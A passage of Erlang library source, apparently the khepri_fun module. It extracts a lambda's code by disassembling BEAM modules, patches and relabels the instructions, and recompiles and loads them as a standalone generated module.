add_comment_and_retry/4,
add_comment_to_function/7,
add_comment_to_code/5,
are_comments_conflicting/2]}).
-type fun_info() :: #{arity => arity(),
env => any(),
index => any(),
name => atom(),
module => module(),
new_index => any(),
new_uniq => any(),
pid => any(),
type => local | external,
uniq => any()}.
-type beam_instr() :: atom() | tuple().
-type label() :: pos_integer().
%% -------------------------------------------------------------------
%% Taken from lib/compiler/src/beam_disasm.hrl,
%% commit <PASSWORD>ba84b07fb8a98d755216e78fa79
-record(function, {name :: atom(),
arity :: byte(),
entry :: beam_lib:label(), %% unnecessary ?
code = [] :: [beam_instr()]}).
-record(beam_file, {module :: module(),
labeled_exports = [] :: [beam_lib:labeled_entry()],
attributes = [] :: [beam_lib:attrib_entry()],
compile_info = [] :: [beam_lib:compinfo_entry()],
code = [] :: [#function{}]}).
%% -------------------------------------------------------------------
-type ensure_instruction_is_permitted_fun() ::
fun((beam_instr()) -> ok).
-type should_process_function_fun() ::
fun((module(), atom(), arity(), module()) -> boolean()).
-type is_standalone_fun_still_needed_fun() ::
fun((#{calls := #{mfa() => true},
errors := [any()]}) -> boolean()).
-type standalone_fun() :: #standalone_fun{} | fun().
-type options() :: #{ensure_instruction_is_permitted =>
ensure_instruction_is_permitted_fun(),
should_process_function =>
should_process_function_fun(),
is_standalone_fun_still_needed =>
is_standalone_fun_still_needed_fun()}.
-export_type([standalone_fun/0,
options/0]).
-record(state, {generated_module_name :: module() | undefined,
entrypoint :: mfa() | undefined,
checksums = #{} :: #{module() => binary()},
fun_info :: fun_info(),
calls = #{} :: #{mfa() => true},
all_calls = #{} :: #{mfa() => true},
functions = #{} :: #{mfa() => #function{}},
mfa_in_progress :: mfa() | undefined,
function_in_progress :: atom() | undefined,
next_label = 1 :: label(),
label_map = #{} :: #{{module(), label()} => label()},
errors = [] :: [any()],
options = #{} :: options()}).
-type asm() :: {module(),
[{atom(), arity()}],
[],
[#function{}],
label()}.
-spec to_standalone_fun(Fun, Options) -> StandaloneFun when
Fun :: fun(),
Options :: options(),
StandaloneFun :: standalone_fun().
to_standalone_fun(Fun, Options) ->
{StandaloneFun, _State} = to_standalone_fun1(Fun, Options),
StandaloneFun.
-spec to_standalone_fun1(Fun, Options) -> {StandaloneFun, State} when
Fun :: fun(),
Options :: options(),
StandaloneFun :: standalone_fun(),
State :: #state{}.
to_standalone_fun1(Fun, Options) ->
Info = maps:from_list(erlang:fun_info(Fun)),
#{module := Module,
name := Name,
arity := Arity} = Info,
State0 = #state{fun_info = Info,
all_calls = #{{Module, Name, Arity} => true},
options = Options},
to_standalone_fun2(Fun, State0).
-spec to_standalone_fun2(Fun, State) -> {StandaloneFun, State} when
Fun :: fun(),
State :: #state{},
StandaloneFun :: standalone_fun().
to_standalone_fun2(
Fun,
#state{fun_info = #{module := Module,
name := Name,
arity := Arity,
type := Type}} = State) ->
%% Don't extract functions like "fun dict:new/0" which are not meant to be
%% copied.
{ShouldProcess,
State1} = case Type of
local ->
should_process_function(
Module, Name, Arity, Module, State);
external ->
_ = code:ensure_loaded(Module),
case erlang:function_exported(Module, Name, Arity) of
true ->
should_process_function(
Module, Name, Arity, undefined, State);
false ->
throw({call_to_unexported_function,
{Module, Name, Arity}})
end
end,
case ShouldProcess of
true ->
State2 = pass1(State1),
%% Fun environment to standalone term.
%%
%% For "regular" lambdas, variables declared outside of the
%% function body are put in this `env'. We need to process them in
%% case they reference other lambdas for instance. We keep the end
%% result to store it alongside the generated module, but not
%% inside the module to avoid an increase in the number of
%% identical modules with different environment.
%%
%% However for `erl_eval' functions created from lambdas, the env
%% contains the parsed source code of the function. We don't need
%% to interpret it.
%%
%% TODO: `to_standalone_env()' uses `to_standalone_fun1()' to
%% extract and compile lambdas passed as arguments. It means they
%% are fully compiled even though
%% `is_standalone_fun_still_needed()' returns false later. This is
%% a waste of resources and this function can probably be split
%% into two parts to allow the environment to be extracted before
%% and compiled after, once we are sure we need to create the
%% final standalone fun.
{Env, State3} = case Module =:= erl_eval andalso Type =:= local of
false -> to_standalone_env(State2);
true -> {[], State2}
end,
%% We offer one last chance to the caller to determine if a
%% standalone function is still useful for him.
%%
%% This callback is only used for the top-level lambda. In other
%% words, if the `env' contains other lambdas (i.e. anonymous
%% functions passed as argument to the top-level one), the
%% callback is not used. However, calls and errors from those
%% inner lambdas are accumulated and can be used by the callback.
case is_standalone_fun_still_needed(State3) of
true ->
process_errors(State3),
Asm = pass2(State3),
{GeneratedModuleName, Beam} = compile(Asm),
StandaloneFun = #standalone_fun{
module = GeneratedModuleName,
beam = Beam,
arity = Arity,
env = Env},
{StandaloneFun, State3};
false ->
{Fun, State3}
end;
false ->
process_errors(State1),
{Fun, State1}
end.
-spec compile(Asm) -> {Module, Beam} when
Asm :: asm(), %% FIXME: compile:forms/2 is incorrectly specified.
Module :: module(),
Beam :: binary().
compile(Asm) ->
CompilerOptions = [from_asm,
binary,
warnings_as_errors,
return_errors,
return_warnings,
deterministic],
case compile:forms(Asm, CompilerOptions) of
{ok, Module, Beam, []} -> {Module, Beam};
Error -> handle_compilation_error(Asm, Error)
end.
handle_compilation_error(
Asm,
{error,
[{_GeneratedModuleName,
[{_, beam_validator,
{FailingFun,
{{get_tuple_element, Src, _Element, _Dst},
_,
{bad_type,
{needed, {t_tuple, _Size, _, _Fields} = NeededType},
{actual, any}}}}}]}],
[]} = Error) ->
VarInfo = {var_info, Src, [{type, NeededType}]},
Comment = {'%', VarInfo},
add_comment_and_retry(Asm, Error, FailingFun, Comment);
handle_compilation_error(
Asm,
%% Same as above, but returned by Erlang 23's compiler instead of Erlang 24+.
{error,
[{_GeneratedModuleName,
[{beam_validator,
{FailingFun,
{{get_tuple_element, Src, _Element, _Dst},
_,
{bad_type,
{needed, {t_tuple, _Size, _, _Fields} = NeededType},
{actual, any}}}}}]}],
[]} = Error) ->
VarInfo = {var_info, Src, [{type, NeededType}]},
Comment = {'%', VarInfo},
add_comment_and_retry(Asm, Error, FailingFun, Comment);
handle_compilation_error(Asm, Error) ->
throw({compilation_failure, Error, Asm}).
add_comment_and_retry(
Asm, Error, {GeneratedModuleName, Name, Arity} = _FailingFun, Comment) ->
{GeneratedModuleName,
Exports,
Attributes,
Functions,
Labels} = Asm,
Functions1 = add_comment_to_function(
Asm, Error, Functions, Name, Arity, Comment, []),
Asm1 = {GeneratedModuleName,
Exports,
Attributes,
Functions1,
Labels},
compile(Asm1).
add_comment_to_function(
Asm, Error,
[#function{name = Name, arity = Arity, code = Code} = Function | Rest],
Name, Arity, Comment, Result) ->
Code1 = add_comment_to_code(Asm, Error, Code, Comment, []),
Function1 = Function#function{code = Code1},
lists:reverse(Result) ++ [Function1 | Rest];
add_comment_to_function(
Asm, Error,
[Function | Rest], Name, Arity, Comment, Result) ->
add_comment_to_function(
Asm, Error, Rest, Name, Arity, Comment, [Function | Result]).
add_comment_to_code(
Asm, Error,
[{label, _} = Instruction | Rest],
Comment, Result) ->
add_comment_to_code(Asm, Error, Rest, Comment, [Instruction | Result]);
add_comment_to_code(
Asm, Error,
[{func_info, _, _, _} = Instruction | Rest],
Comment, Result) ->
add_comment_to_code(Asm, Error, Rest, Comment, [Instruction | Result]);
add_comment_to_code(
Asm, Error,
[{'%', _} = Instruction | Rest],
Comment, Result) ->
case are_comments_conflicting(Instruction, Comment) of
false ->
add_comment_to_code(
Asm, Error, Rest, Comment, [Instruction | Result]);
true ->
throw(
{conflicting_assembly_annotations,
Instruction, Comment, Error, Asm})
end;
add_comment_to_code(
_Asm, _Error,
Rest,
Comment, Result) ->
lists:reverse(Result) ++ [Comment | Rest].
are_comments_conflicting(
{'%', {var_info, Register, _}},
{'%', {var_info, Register, _}}) ->
%% If we are about to generate two `var_info' comments affecting the same
%% register (i.e. same variable), we abort.
true;
are_comments_conflicting(_Comment1, _Comment2) ->
false.
-spec exec(StandaloneFun, Args) -> Ret when
StandaloneFun :: standalone_fun(),
Args :: [any()],
Ret :: any().
exec(
#standalone_fun{module = Module,
beam = Beam,
arity = Arity,
env = Env},
Args) when length(Args) =:= Arity ->
case code:is_loaded(Module) of
false ->
{module, _} = code:load_binary(Module, ?MODULE_STRING, Beam),
ok;
_ ->
ok
end,
Env1 = to_actual_arg(Env),
erlang:apply(Module, run, Args ++ Env1);
exec(#standalone_fun{} = StandaloneFun, Args) ->
exit({badarity, {StandaloneFun, Args}});
exec(Fun, Args) ->
erlang:apply(Fun, Args).
%% -------------------------------------------------------------------
%% Code processing [Pass 1]
%% -------------------------------------------------------------------
-spec pass1(State) -> State when
State :: #state{}.
pass1(
#state{fun_info = #{module := erl_eval, type := local} = Info,
checksums = Checksums} = State) ->
#{module := Module,
name := Name,
arity := Arity} = Info,
Checksum = maps:get(new_uniq, Info),
?assert(is_binary(Checksum)),
Checksums1 = Checksums#{Module => Checksum},
State1 = State#state{checksums = Checksums1,
entrypoint = {Module, Name, Arity}},
pass1_process_function(Module, Name, Arity, State1);
pass1(
#state{fun_info = Info,
checksums = Checksums} = State) ->
#{module := Module,
name := Name,
arity := Arity,
env := Env} = Info,
%% Internally, a lambda which takes arguments and values from its
%% environment (i.e. variables declared in the function which defined that
%% lambda).
InternalArity = Arity + length(Env),
State1 = case maps:get(type, Info) of
local ->
Checksum = maps:get(new_uniq, Info),
?assert(is_binary(Checksum)),
Checksums1 = Checksums#{Module => Checksum},
State#state{checksums = Checksums1};
external ->
State
end,
State2 = State1#state{entrypoint = {Module, Name, InternalArity}},
pass1_process_function(Module, Name, InternalArity, State2).
-spec pass1_process_function(Module, Name, Arity, State) -> State when
Module :: module(),
Name :: atom(),
Arity :: arity(),
State :: #state{}.
pass1_process_function(
Module, Name, Arity,
#state{functions = Functions} = State)
when is_map_key({Module, Name, Arity}, Functions) ->
State;
pass1_process_function(Module, Name, Arity, State) ->
MFA = {Module, Name, Arity},
State1 = State#state{mfa_in_progress = MFA,
calls = #{}},
{Function0, State2} = lookup_function(Module, Name, Arity, State1),
{Function1, State3} = pass1_process_function_code(Function0, State2),
#state{calls = Calls,
functions = Functions} = State3,
Functions1 = Functions#{MFA => Function1},
State4 = State3#state{functions = Functions1},
%% Recurse with called functions.
maps:fold(
fun({M, F, A}, true, St) ->
pass1_process_function(M, F, A, St)
end, State4, Calls).
-spec pass1_process_function_code(Function, State) -> {Function, State} when
Function :: #function{},
State :: #state{}.
pass1_process_function_code(
#function{entry = OldEntryLabel,
code = Instructions} = Function,
#state{mfa_in_progress = {Module, _, _} = MFA,
next_label = NextLabel,
functions = Functions} = State) ->
?assertNot(maps:is_key(MFA, Functions)),
%% Compute label diff.
{label, FirstLabel} = lists:keyfind(label, 1, Instructions),
LabelDiff = NextLabel - FirstLabel,
%% pass1_process_instructions
{Instructions1, State1} = pass1_process_instructions(Instructions, State),
%% Compute its new entry label.
#state{label_map = LabelMap} = State1,
LabelKey = {Module, OldEntryLabel},
NewEntryLabel = maps:get(LabelKey, LabelMap),
?assertEqual(LabelDiff, NewEntryLabel - OldEntryLabel),
%% Rename function & fix its entry label.
Function1 = Function#function{
entry = NewEntryLabel,
code = Instructions1},
{Function1, State1}.
-spec pass1_process_instructions(Instructions, State) ->
{Instructions, State} when
Instructions :: [beam_instr()],
State :: #state{}.
pass1_process_instructions(Instructions, State) ->
pass1_process_instructions(Instructions, State, []).
%% The first group of clauses of this function patch incorrectly decoded
%% instructions. These clauses recurse after fixing the instruction to enter
%% the second group of clauses who.
%%
%% The second group of clauses:
%% 1. ensures the instruction is known and allowed,
%% 2. records all calls that need their code to be copied and
%% 3. records jump labels.
%% First group.
pass1_process_instructions(
[{bs_append, _, _, _, _, _, _, {field_flags, FF}, _} = Instruction0 | Rest],
State,
Result)
when is_integer(FF) ->
%% `beam_disasm' did not decode this instruction's field flags.
Instruction = decode_field_flags(Instruction0, 8),
pass1_process_instructions([Instruction | Rest], State, Result);
pass1_process_instructions(
[{bs_init2, _, _, _, _, {field_flags, FF}, _} = Instruction0 | Rest],
State,
Result)
when is_integer(FF) ->
%% `beam_disasm' did not decode this instruction's field flags.
Instruction = decode_field_flags(Instruction0, 6),
pass1_process_instructions([Instruction | Rest], State, Result);
pass1_process_instructions(
[{BsPutSomething, _, _, _, {field_flags, FF}, _} = Instruction0 | Rest],
State,
Result)
when (BsPutSomething =:= bs_put_binary orelse
BsPutSomething =:= bs_put_integer) andalso
is_integer(FF) ->
%% `beam_disasm' did not decode this instruction's field flags.
Instruction = decode_field_flags(Instruction0, 5),
pass1_process_instructions([Instruction | Rest], State, Result);
pass1_process_instructions(
[{bs_start_match3, Fail, Bin, {u, Live}, Dst} | Rest],
State,
Result) ->
%% `beam_disasm' did not decode this instruction correctly. We need to
%% patch it to:
%% 1. add `test' as the first element in the tuple,
%% 2. swap `Bin' and `Live',
%% 3. put `Bin' in a list and
%% 4. store `Live' as an integer.
Instruction = {test, bs_start_match3, Fail, Live, [Bin], Dst},
pass1_process_instructions([Instruction | Rest], State, Result);
pass1_process_instructions(
[{test, bs_get_integer2,
Fail, [Ctx, Live, Size, Unit, {field_flags, FF} = FieldFlags0, Dst]}
| Rest],
State,
Result) when is_integer(FF) ->
%% `beam_disasm' did not decode this instruction correctly. We need to
%% patch it to move `Live' before the list. We also need to decode field
%% flags.
FieldFlags = decode_field_flags(FieldFlags0),
Instruction = {test, bs_get_integer2,
Fail, Live, [Ctx, Size, Unit, FieldFlags], Dst},
pass1_process_instructions([Instruction | Rest], State, Result);
pass1_process_instructions(
[{test, bs_match_string, Fail, [Ctx, Stride, String]} | Rest],
State,
Result) when is_binary(String) ->
%% `beam_disasm' did not decode this instruction correctly. We need to
%% patch it to put `String' inside a tuple.
Instruction = {test, bs_match_string,
Fail, [Ctx, Stride, {string, String}]},
pass1_process_instructions([Instruction | Rest], State, Result);
%% Second group.
pass1_process_instructions(
[{Call, Arity, {Module, Name, Arity}} = Instruction | Rest],
State,
Result)
when Call =:= call orelse Call =:= call_only ->
State1 = ensure_instruction_is_permitted(Instruction, State),
State2 = pass1_process_call(Module, Name, Arity, State1),
pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
[{Call, Arity, {extfunc, Module, Name, Arity}} = Instruction | Rest],
State,
Result)
when Call =:= call_ext orelse Call =:= call_ext_only ->
State1 = ensure_instruction_is_permitted(Instruction, State),
State2 = pass1_process_call(Module, Name, Arity, State1),
pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
[{call_last, Arity, {Module, Name, Arity}, _} = Instruction
| Rest],
State,
Result) ->
State1 = ensure_instruction_is_permitted(Instruction, State),
State2 = pass1_process_call(Module, Name, Arity, State1),
pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
[{call_ext_last, Arity, {extfunc, Module, Name, Arity}, _} = Instruction
| Rest],
State,
Result) ->
State1 = ensure_instruction_is_permitted(Instruction, State),
State2 = pass1_process_call(Module, Name, Arity, State1),
pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
[{label, OldLabel} | Rest],
#state{mfa_in_progress = {Module, _, _},
next_label = NewLabel,
label_map = LabelMap} = State,
Result) ->
Instruction = {label, NewLabel},
LabelKey = {Module, OldLabel},
?assertNot(maps:is_key(LabelKey, LabelMap)),
LabelMap1 = LabelMap#{LabelKey => NewLabel},
State1 = State#state{next_label = NewLabel + 1,
label_map = LabelMap1},
pass1_process_instructions(Rest, State1, [Instruction | Result]);
pass1_process_instructions(
[{line, _} | Rest],
State,
Result) ->
%% Drop this instruction.
pass1_process_instructions(Rest, State, Result);
pass1_process_instructions(
[{make_fun2, {Module, Name, Arity}, _, _, _} = Instruction | Rest],
State,
Result) ->
State1 = ensure_instruction_is_permitted(Instruction, State),
State2 = pass1_process_call(Module, Name, Arity, State1),
pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
[{make_fun3, {Module, Name, Arity}, _, _, _, _} = Instruction | Rest],
State,
Result) ->
State1 = ensure_instruction_is_permitted(Instruction, State),
State2 = pass1_process_call(Module, Name, Arity, State1),
pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
[Instruction | Rest],
State,
Result) ->
State1 = ensure_instruction_is_permitted(Instruction, State),
pass1_process_instructions(Rest, State1, [Instruction | Result]);
pass1_process_instructions(
[],
State,
Result) ->
{lists:reverse(Result), State}.
-spec pass1_process_call(Module, Name, Arity, State) -> State when
Module :: module(),
Name :: atom(),
Arity :: arity(),
State :: #state{}.
pass1_process_call(
Module, Name, Arity,
#state{mfa_in_progress = {Module, Name, Arity}} = State) ->
State;
pass1_process_call(
Module, Name, Arity,
#state{mfa_in_progress = {FromModule, _, _},
functions = Functions,
calls = Calls,
all_calls = AllCalls} = State) ->
CallKey = {Module, Name, Arity},
AllCalls1 = AllCalls#{CallKey => true},
case should_process_function(Module, Name, Arity, FromModule, State) of
{true, State1} ->
case Functions of
#{CallKey := _} ->
State1;
_ ->
Calls1 = Calls#{CallKey => true},
State1#state{calls = Calls1,
all_calls = AllCalls1}
end;
{false, State1} ->
State1#state{all_calls = AllCalls1}
end.
-spec lookup_function(Module, Name, Arity, State) -> {Function, State} when
Module :: module(),
Name :: atom(),
Arity :: non_neg_integer() | undefined,
State :: #state{},
Function :: #function{}.
lookup_function(
erl_eval = Module, Name, _Arity,
#state{fun_info = #{module := Module,
name := Name,
arity := Arity,
env := Env}} = State) ->
%% There is a special case for `erl_eval' local functions: they are
%% lambdas dynamically parsed, compiled and loaded by `erl_eval' and
%% appear as local functions inside `erl_eval' directly.
%%
%% However `erl_eval' module doesn't contain the assembly for those
%% functions. Instead, the abstract form of the source code is available
%% in the lambda's env.
%%
%% There here, we compile the abstract form and extract the assembly from
%% the compiled beam. This allows to use the rest of `khepri_fun'
%% unmodified.
#beam_file{code = Code} = erl_eval_fun_to_asm(Module, Name, Arity, Env),
{lookup_function1(Code, Name, Arity), State};
lookup_function(Module, Name, Arity, State) ->
{#beam_file{code = Code}, State1} = disassemble_module(Module, State),
{lookup_function1(Code, Name, Arity), State1}.
lookup_function1(
[#function{name = Name, arity = Arity} = Function | _],
Name, Arity) when is_integer(Arity) ->
Function;
lookup_function1(
[#function{name = Name} = Function | _],
Name, undefined) ->
Function;
lookup_function1(
[_ | Rest],
Name, Arity) ->
lookup_function1(Rest, Name, Arity).
-spec erl_eval_fun_to_asm(Module, Name, Arity, Env) -> BeamFileRecord when
Module :: module(),
Name :: atom(),
Arity :: arity(),
Env :: any(),
BeamFileRecord :: #beam_file{}.
%% @private
erl_eval_fun_to_asm(Module, Name, Arity, [{Bindings, _, _, Clauses}])
when Bindings =:= [] orelse %% Erlang is using a list for bindings,
Bindings =:= #{} -> %% but Elixir is using a map.
%% We construct an abstract form based on the `env' of the lambda loaded
%% by `erl_eval'.
Anno = erl_anno:from_term(1),
Forms = [{attribute, Anno, module, Module},
{attribute, Anno, export, [{Name, Arity}]},
{function, Anno, Name, Arity, Clauses}],
%% The abstract form is now compiled to binary code. Then, the assembly
%% code is extracted from the compiled beam.
CompilerOptions = [from_abstr,
binary,
return_errors,
return_warnings,
deterministic],
case compile:forms(Forms, CompilerOptions) of
{ok, Module, Beam, _Warnings} ->
%% We can ignore warnings because the lambda was already parsed
%% and compiled before by `erl_eval' previously.
do_disassemble(Beam);
Error ->
throw({erl_eval_fun_compilation_failure, Error})
end.
-spec disassemble_module(Module, State) -> {BeamFileRecord, State} when
Module :: module(),
State :: #state{},
BeamFileRecord :: #beam_file{}.
-define(ASM_CACHE_KEY(Module, Checksum),
{?MODULE, asm_cache, Module, Checksum}).
disassemble_module(Module, #state{checksums = Checksums} = State) ->
case Checksums of
#{Module := Checksum} ->
{BeamFileRecord, Checksum} = disassemble_module1(
Module, Checksum),
{BeamFileRecord, State};
_ ->
{BeamFileRecord, Checksum} = disassemble_module1(
Module, undefined),
?assert(is_binary(Checksum)),
Checksums1 = Checksums#{Module => Checksum},
State1 = State#state{checksums = Checksums1},
{BeamFileRecord, State1}
end.
disassemble_module1(Module, Checksum) when is_binary(Checksum) ->
Key = ?ASM_CACHE_KEY(Module, Checksum),
case persistent_term:get(Key, undefined) of
#beam_file{} = BeamFileRecord ->
{BeamFileRecord, Checksum};
undefined ->
{Module, Beam, _} = get_object_code(Module),
{ok, {Module, ActualChecksum}} = beam_lib:md5(Beam),
case ActualChecksum of
Checksum ->
BeamFileRecord = do_disassemble_and_cache(
Module, Checksum, Beam),
{BeamFileRecord, Checksum};
_ ->
throw(
{mismatching_module_checksum,
Module, Checksum, ActualChecksum})
end
end;
disassemble_module1(Module, undefined) ->
{Module, Beam, _} = get_object_code(Module),
{ok, {Module, Checksum}} = beam_lib:md5(Beam),
BeamFileRecord = do_disassemble_and_cache(Module, Checksum, Beam),
{BeamFileRecord, Checksum}.
get_object_code(Module) ->
case code:get_object_code(Module) of
{Module, Beam, Filename} -> {Module, Beam, Filename};
error -> throw({module_not_found, Module})
end.
do_disassemble_and_cache(Module, Checksum, Beam) ->
Key = ?ASM_CACHE_KEY(Module, Checksum),
BeamFileRecord = do_disassemble(Beam),
persistent_term:put(Key, BeamFileRecord),
BeamFileRecord.
do_disassemble(Beam) ->
beam_disasm:file(Beam).
%% The field flags, which correspond to `Var/signed', `Var/unsigned',
%% `Var/little', `Var/big' and `Var/native' in the bitstring syntax, need to
%% be decoded here. It's the opposite to:
%% https://github.com/erlang/otp/blob/OTP-24.2/lib/compiler/src/beam_asm.erl#L486-L493
%%
%% The field flags bit field becomes a sublist of [signed, little, native].
decode_field_flags(Instruction, Pos) when is_tuple(Instruction) ->
FieldFlags0 = element(Pos, Instruction),
FieldFlags1 = decode_field_flags(FieldFlags0),
setelement(Pos, Instruction, FieldFlags1).
-spec decode_field_flags(FieldFlagsBitFieldsTuple | FieldFlagsBitField) ->
FieldFlagsTuple | FieldFlags when
FieldFlagsBitFieldsTuple :: {field_flags, FieldFlagsBitField},
FieldFlagsBitField :: non_neg_integer(),
FieldFlagsTuple :: {field_flags, FieldFlags},
FieldFlags :: [FieldFlag],
FieldFlag :: little | signed | native.
decode_field_flags(0) ->
[];
decode_field_flags(FieldFlags) when is_integer(FieldFlags) ->
lists:filtermap(
fun
(little) -> (FieldFlags band 16#02) == 16#02;
(signed) -> (FieldFlags band 16#04) == 16#04;
(native) -> (FieldFlags band 16#10) == 16#10
end, [signed, little, native]);
decode_field_flags({field_flags, FieldFlagsBitField}) ->
FieldFlags = decode_field_flags(FieldFlagsBitField),
{field_flags, FieldFlags}.
-spec ensure_instruction_is_permitted(Instruction, State) ->
State when
Instruction :: beam_instr(),
State :: #state{}.
ensure_instruction_is_permitted(
Instruction,
#state{options = #{ensure_instruction_is_permitted := Callback},
errors = Errors} = State)
when is_function(Callback) ->
try
Callback(Instruction),
State
catch
throw:Error ->
Errors1 = Errors ++ [Error],
State#state{errors = Errors1}
end;
ensure_instruction_is_permitted(_Instruction, State) ->
State.
-spec should_process_function(Module, Name, Arity, FromModule, State) ->
{ShouldProcess, State} when
Module :: module(),
Name :: atom(),
Arity :: arity(),
FromModule :: module(),
State :: #state{},
ShouldProcess :: boolean().
should_process_function(
erl_eval, Name, Arity, _FromModule,
#state{fun_info = #{module := erl_eval,
name := Name,
arity := Arity,
type := local}} = State) ->
%% We want to process lambas loaded by `erl_eval'
%% even though we wouldn't do that with the
%% regular `erl_eval' API.
{true, State};
should_process_function(
Module, Name, Arity, FromModule,
#state{options = #{should_process_function := Callback},
errors = Errors} = State)
when is_function(Callback) ->
try
ShouldProcess = Callback(Module, Name, Arity, FromModule),
{ShouldProcess, State}
catch
throw:Error ->
Errors1 = Errors ++ [Error],
State1 = State#state{errors = Errors1},
{false, State1}
end;
should_process_function(Module, Name, Arity, _FromModule, State) ->
{default_should_process_function(Module, Name, Arity),
State}.
default_should_process_function(erlang, _Name, _Arity) -> false;
default_should_process_function(_Module, _Name, _Arity) -> true.
-spec is_standalone_fun_still_needed(State) -> IsNeeded when
State :: #state{},
IsNeeded :: boolean().
is_standalone_fun_still_needed(
#state{options = #{is_standalone_fun_still_needed := Callback},
all_calls = Calls,
errors = Errors})
when is_function(Callback) ->
Callback(#{calls => Calls,
errors => Errors});
is_standalone_fun_still_needed(_State) ->
true.
-spec process_errors(State) -> ok | no_return() when
State :: #state{}.
%% TODO: Return all errors?
process_errors(#state{errors = []}) -> ok;
process_errors(#state{errors = [Error | _]}) -> throw(Error).
%% -------------------------------------------------------------------
%% Code processing [Pass 2]
%% -------------------------------------------------------------------
-spec pass2(State) -> Asm when
State :: #state{},
Asm :: asm().
pass2(
#state{functions = Functions,
next_label = NextLabel} = State) ->
%% The module name is based on a hash of its entire code.
GeneratedModuleName = gen_module_name(Functions, State),
State1 = State#state{generated_module_name = GeneratedModuleName},
Functions1 = pass2_process_functions(Functions, State1),
%% Sort functions by their entrypoint label.
Functions2 = lists:sort(
fun(#function{entry = EntryA},
#function{entry = EntryB}) ->
EntryA < EntryB
end, maps:values(Functions1)),
%% The first function (the lambda) is the only one exported.
[#function{name = Name, arity = Arity} | _] = Functions2,
Exports = [{Name, Arity}],
Attributes = [],
Labels = NextLabel,
{GeneratedModuleName,
Exports,
Attributes,
Functions2,
Labels}.
-spec pass2_process_functions(Functions, State) -> Functions when
Functions :: #{mfa() => #function{}},
State :: #state{}.
pass2_process_functions(Functions, State) ->
maps:map(
fun(MFA, Function) ->
pass2_process_function(MFA, Function, State)
end, Functions).
-spec pass2_process_function(MFA, Function, State) -> Function when
MFA :: mfa(),
Function :: #function{},
State :: #state{}.
pass2_process_function(
{Module, Name, Arity},
#function{name = Name,
code = Instructions} = Function,
State) ->
Name1 = gen_function_name(Module, Name, Arity, State),
Instructions1 = lists:map(
fun(Instruction) ->
S1 = State#state{mfa_in_progress = {Module,
Name,
Arity},
function_in_progress = Name1},
pass2_process_instruction(Instruction, S1)
end, Instructions),
Function#function{name = Name1,
code = Instructions1}.
-spec pass2_process_instruction(Instruction, State) -> Instruction when
Instruction :: beam_instr(),
State :: #state{}.
pass2_process_instruction(
{Call, Arity, {_, _, _} = MFA} = Instruction,
#state{functions = Functions})
when Call =:= call orelse Call =:= call_only ->
case Functions of
#{MFA := #function{entry = EntryLabel}} ->
{Call, Arity, {f, EntryLabel}};
_ ->
Instruction
end;
pass2_process_instruction(
{Call, Arity, {extfunc, Module, Name, Arity}} = Instruction,
#state{functions = Functions})
when Call =:= call_ext orelse Call =:= call_ext_only ->
MFA = {Module, Name, Arity},
case Functions of
#{MFA := #function{entry = EntryLabel}} ->
Call1 = case Call of
call_ext -> call;
call_ext_only -> call_only
end,
{Call1, Arity, {f, EntryLabel}};
_ ->
Instruction
end;
pass2_process_instruction(
{bs_add, _, _, _} = Instruction, State) ->
replace_label(Instruction, 2, State);
pass2_process_instruction(
{bs_append, _, _, _, _, _, _, _, _} = Instruction, State) ->
replace_label(Instruction, 2, State);
pass2_process_instruction(
{bs_init2, _, _, _, _, _, _} = Instruction, State) ->
replace_label(Instruction, 2, State);
pass2_process_instruction(
{BsPutSomething, _, _, _, _, _} = Instruction, State)
when BsPutSomething =:= bs_put_binary orelse
BsPutSomething =:= bs_put_integer ->
replace_label(Instruction, 2, State);
pass2_process_instruction(
{call_last, Arity, {Module, Name, Arity}, Opaque} = Instruction,
#state{functions = Functions}) ->
MFA = {Module, Name, Arity},
case Functions of
#{MFA := #function{entry = EntryLabel}} ->
{call_last, Arity, {f, EntryLabel}, Opaque};
_ ->
Instruction
end;
pass2_process_instruction(
{call_ext_last, Arity, {extfunc, Module, Name, Arity}, Opaque} = Instruction,
#state{functions = Functions}) ->
MFA = {Module, Name, Arity},
case Functions of
#{MFA := #function{entry = EntryLabel}} ->
{call_last, Arity, {f, EntryLabel}, Opaque};
_ ->
Instruction
end;
pass2_process_instruction(
{'catch', _, _} = Instruction, State) ->
replace_label(Instruction, 3, State);
pass2_process_instruction(
{func_info, _ModRepr, _NameRepr, Arity},
#state{generated_module_name = GeneratedModuleName,
function_in_progress = Name}) ->
ModRepr = {atom, GeneratedModuleName},
NameRepr = {atom, Name},
{func_info, ModRepr, NameRepr, Arity};
pass2_process_instruction(
{get_map_elements, _, _, _} = Instruction, State) ->
replace_label(Instruction, 2, State);
pass2_process_instruction(
{jump, _} = Instruction, State) ->
replace_label(Instruction, 2, State);
pass2_process_instruction(
{loop_rec, _, _} = Instruction, State) ->
replace_label(Instruction, 2, State);
pass2_process_instruction(
{select_val, _, _, {list, Cases}} = Instruction,
#state{mfa_in_progress = {Module, _, _},
label_map = LabelMap} = State) ->
Cases1 = [case Case of
{f, OldLabel} ->
NewLabel = maps:get({Module, OldLabel}, LabelMap),
{f, NewLabel};
_ ->
Case
end || Case <- Cases],
Instruction1 = replace_label(Instruction, 3, State),
setelement(4, Instruction1, {list, Cases1});
pass2_process_instruction(
{test, _, _, _} = Instruction, State) ->
replace_label(Instruction, 3, State);
pass2_process_instruction(
{test, _, _, _, _} = Instruction, State) ->
replace_label(Instruction, 3, State);
pass2_process_instruction(
{test, _, _, _, _, _} = Instruction, State) ->
replace_label(Instruction, 3, State);
pass2_process_instruction(
{make_fun2, {_, _, _} = MFA, _, _, _} = Instruction,
#state{functions = Functions}) ->
case Functions of
#{MFA := #function{entry = EntryLabel}} ->
setelement(2, Instruction, {f, EntryLabel});
_ ->
Instruction
end;
pass2_process_instruction(
{make_fun3, {_, _, _} = MFA, _, _, _, _} = Instruction,
#state{functions = Functions}) ->
case Functions of
#{MFA := #function{entry = EntryLabel}} ->
setelement(2, Instruction, {f, EntryLabel});
_ ->
Instruction
end;
pass2_process_instruction(
{'try', _, _} = Instruction, State) ->
replace_label(Instruction, 3, State);
pass2_process_instruction(
{wait_timeout, _, _} = Instruction, State) ->
replace_label(Instruction, 2, State);
pass2_process_instruction(
Instruction,
_State) ->
Instruction.
replace_label(
Instruction, Pos,
